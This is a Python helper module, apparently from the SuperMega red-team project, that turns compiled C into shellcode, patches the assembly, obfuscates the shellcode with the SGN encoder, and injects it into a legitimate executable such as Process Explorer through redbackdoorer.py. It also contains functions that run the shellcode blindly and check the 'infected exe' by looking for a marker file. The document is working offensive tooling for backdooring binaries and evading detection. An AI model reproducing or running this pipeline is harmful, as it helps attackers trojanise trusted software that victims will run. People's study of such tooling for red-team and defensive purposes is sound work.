mirror of
https://github.com/dobin/SuperMega
synced 2026-06-03 01:27:11 +00:00
Dobin
283 lines
8.3 KiB
Python
283 lines
8.3 KiB
Python
import subprocess
|
|
import os
|
|
import pefile
|
|
import time
|
|
import shutil
|
|
import pathlib
|
|
import sys
|
|
|
|
SHC_VERIFY_SLEEP = 0.1
|
|
|
|
path_cl = r'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
|
|
path_ml64 = r'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'
|
|
|
|
path_masmshc = r'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
|
|
path_runshc = r'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'
|
|
#path_shexec = r'C:\Research\hasherezade\exec_fiber\sh-exec-fiber.exe'
|
|
|
|
verify_filename = r'C:\Temp\a'
|
|
build_dir = "build"
|
|
|
|
|
|
def clean_files():
|
|
print("--[ Remove old files ]")
|
|
|
|
files_to_clean = [
|
|
# compile artefacts in current dir
|
|
"main-clean.obj",
|
|
"main.obj",
|
|
"mllink$.lnk",
|
|
|
|
# out/ stuff
|
|
os.path.join(build_dir, "main.asm"),
|
|
os.path.join(build_dir, "main.bin"),
|
|
os.path.join(build_dir, "main.c"),
|
|
#os.path.join(build_dir, "main.exe"),
|
|
|
|
verify_filename,
|
|
]
|
|
for file in files_to_clean:
|
|
pathlib.Path(file).unlink(missing_ok=True)
|
|
|
|
|
|
def make_c_to_asm(c_file, asm_file, payload_len):
|
|
print("--[ C to ASM: {} -> {} ]".format(c_file, asm_file))
|
|
|
|
asm = {
|
|
"initial": "",
|
|
"cleanup": "",
|
|
"fixup": "",
|
|
}
|
|
|
|
# Phase 1: Compile
|
|
print("---[ Compile: {} ]".format(c_file))
|
|
subprocess.run([
|
|
path_cl,
|
|
"/c",
|
|
"/FA",
|
|
"/GS-",
|
|
"/Fa{}/".format(os.path.dirname(c_file)),
|
|
c_file,
|
|
], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
|
|
if not os.path.isfile(asm_file):
|
|
print("Error: Compiling failed")
|
|
return
|
|
asm["initial"] = file_readall_text(asm_file)
|
|
|
|
# Phase 2: Assembly cleanup
|
|
asm_clean_file = asm_file + ".clean"
|
|
print("---[ Cleanup: {} ]".format(asm_file))
|
|
subprocess.run([
|
|
path_masmshc,
|
|
asm_file,
|
|
asm_clean_file,
|
|
], check=True, stdout=subprocess.DEVNULL)
|
|
if not os.path.isfile(asm_clean_file):
|
|
print("Error: Cleanup filed")
|
|
return
|
|
else:
|
|
shutil.move(asm_clean_file, asm_file)
|
|
asm["cleanup"] = file_readall_text(asm_file)
|
|
|
|
# Phase 2: Assembly fixup
|
|
print("---[ Fixup : {} ]".format(asm_file))
|
|
if not fixup_asm_file(asm_file, payload_len):
|
|
print("Error: Fixup failed")
|
|
return
|
|
else:
|
|
asm["fixup"] = file_readall_text(asm_file)
|
|
|
|
return asm
|
|
|
|
|
|
def fixup_asm_file(filename, payload_len):
|
|
with open(filename, 'r') as asmfile:
|
|
lines = asmfile.readlines()
|
|
|
|
# replace external reference with shellcode reference
|
|
for idx, line in enumerate(lines):
|
|
if "dobin" in lines[idx]:
|
|
print(" > Replace external reference at line: {}".format(idx))
|
|
lines[idx] = lines[idx].replace(
|
|
"mov r8, QWORD PTR dobin",
|
|
"lea r8, [shcstart]"
|
|
)
|
|
|
|
# replace payload length
|
|
for idx, line in enumerate(lines):
|
|
if "11223344" in lines[idx]:
|
|
print(" > Replace payload length at line: {}".format(idx))
|
|
lines[idx] = lines[idx].replace("11223344", str(payload_len+1))
|
|
break
|
|
|
|
# add label at end of code
|
|
for idx, line in enumerate(lines):
|
|
if lines[idx].startswith("END"):
|
|
print(" > Add end of code label at line: {}".format(idx))
|
|
lines.insert(idx-1, "shcstart:\r\n")
|
|
lines.insert(idx, "\tnop\r\n")
|
|
break
|
|
|
|
with open(filename, 'w') as asmfile:
|
|
asmfile.writelines(lines)
|
|
|
|
return True
|
|
|
|
|
|
def make_shc_from_asm(asm_file, exe_file, shc_file):
|
|
print("--[ Assemble to exe: {} -> {} -> {} ]".format(asm_file, exe_file, shc_file))
|
|
|
|
print("---[ Assemble ASM to EXE: {} -> {} ]".format(asm_file, exe_file))
|
|
subprocess.run([
|
|
path_ml64,
|
|
asm_file,
|
|
"/link",
|
|
"/OUT:{}".format(exe_file),
|
|
"/entry:AlignRSP"
|
|
], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
|
|
if not os.path.isfile(exe_file):
|
|
print("Error")
|
|
return
|
|
|
|
print("---[ EXE to SHC: {} -> {} ]".format(exe_file, shc_file))
|
|
code = get_code_section(exe_file)
|
|
with open(shc_file, 'wb') as f:
|
|
f.write(code)
|
|
|
|
return code
|
|
#print("---[ Shellcode from {} written to: {} (size: {}) ]".format(exe_file, shc_file, len(code)))
|
|
|
|
|
|
def get_code_section(pe_file):
|
|
try:
|
|
# Load the PE file
|
|
pe = pefile.PE(pe_file)
|
|
|
|
# Iterate over the sections
|
|
for section in pe.sections:
|
|
# Check if this is the code section
|
|
if '.text' in section.Name.decode().rstrip('\x00'):
|
|
data = section.get_data()
|
|
data = remove_trailing_null_bytes(data)
|
|
print(" > Code Size: {} (raw code section size: {})".format(
|
|
len(data), section.SizeOfRawData))
|
|
return data
|
|
else:
|
|
print("Code section not found.")
|
|
|
|
except FileNotFoundError:
|
|
print(f"File not found: {pe_file}")
|
|
except pefile.PEFormatError:
|
|
print(f"Invalid PE file: {pe_file}")
|
|
|
|
|
|
def remove_trailing_null_bytes(data):
|
|
for i in range(len(data) - 1, -1, -1):
|
|
if data[i] != b'\x00'[0]: # Check for a non-null byte
|
|
return data[:i + 1]
|
|
return b'' # If the entire sequence is null bytes
|
|
|
|
|
|
def try_start_shellcode(shc_file):
|
|
print("--[ Blindly execute shellcode: {} ]".format(shc_file))
|
|
subprocess.run([
|
|
path_runshc,
|
|
shc_file,
|
|
], check=True)
|
|
|
|
|
|
def obfuscate_shc_loader(file_shc_in, file_shc_out):
|
|
print("--[ Convert with SGN ]")
|
|
path_sgn = r'C:\training\tools\sgn\sgn.exe'
|
|
subprocess.run([
|
|
path_sgn,
|
|
"--arch=64",
|
|
"-i", "{}".format(file_shc_in),
|
|
"-o", "{}".format(file_shc_out),
|
|
], check=True)
|
|
if not os.path.isfile(file_shc_out):
|
|
print("Error")
|
|
return
|
|
else:
|
|
print(" > Success obfuscation")
|
|
pass
|
|
|
|
|
|
def test_shellcode(shc_name):
|
|
print("---[ Test shellcode: {} ]".format(shc_name))
|
|
subprocess.run([
|
|
path_runshc,
|
|
"{}".format(shc_name),
|
|
]) # , check=True
|
|
|
|
|
|
def verify_shellcode(shc_name):
|
|
print("---[ Verify shellcode: {} ]".format(shc_name))
|
|
|
|
# check if directory exists
|
|
if not os.path.exists(os.path.dirname(verify_filename)):
|
|
print("Error, directory does not exist for: {}".format(verify_filename))
|
|
return
|
|
|
|
# remove indicator file
|
|
pathlib.Path(verify_filename).unlink(missing_ok=True)
|
|
|
|
subprocess.run([
|
|
path_runshc,
|
|
"{}".format(shc_name),
|
|
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # , check=True
|
|
time.sleep(SHC_VERIFY_SLEEP)
|
|
if os.path.isfile(verify_filename):
|
|
print("---> Verify OK. Shellcode payload verified (file was created)")
|
|
os.remove(verify_filename)
|
|
return True
|
|
else:
|
|
print("---> Verify FAIL. Payload did not create file.")
|
|
return False
|
|
|
|
|
|
def inject_exe(shc_file, exe_in, exe_out):
|
|
print("--[ Injecting: {} into: {} -> {} ]".format(
|
|
shc_file, exe_in, exe_out
|
|
))
|
|
shutil.copyfile(exe_in, exe_out)
|
|
|
|
# python3.exe .\redbackdoorer.py 1,1 main-clean-append.bin .\exes\procexp64-a.exe
|
|
subprocess.run([
|
|
"python3.exe",
|
|
"redbackdoorer.py",
|
|
"1,1",
|
|
shc_file,
|
|
exe_out
|
|
], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
|
|
|
|
|
|
def verify_injected_exe(exefile):
|
|
print("---[ Verify infected exe: {} ]".format(exefile))
|
|
# remove indicator file
|
|
pathlib.Path(verify_filename).unlink(missing_ok=True)
|
|
|
|
subprocess.run([
|
|
exefile,
|
|
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # , check=True
|
|
time.sleep(SHC_VERIFY_SLEEP)
|
|
if os.path.isfile(verify_filename):
|
|
print("---> Verify OK. Infected exe verified (file was created)")
|
|
# better to remove it immediately
|
|
os.remove(verify_filename)
|
|
return True
|
|
else:
|
|
print("---> Verify FAIL. Infected exe did not create file.")
|
|
return False
|
|
|
|
|
|
def file_readall_text(filepath) -> str:
|
|
with open(filepath, "r") as f:
|
|
data = f.read()
|
|
return data
|
|
|
|
def file_readall_binary(filepath) -> bytes:
|
|
with open(filepath, "rb") as f:
|
|
data = f.read()
|
|
return data
|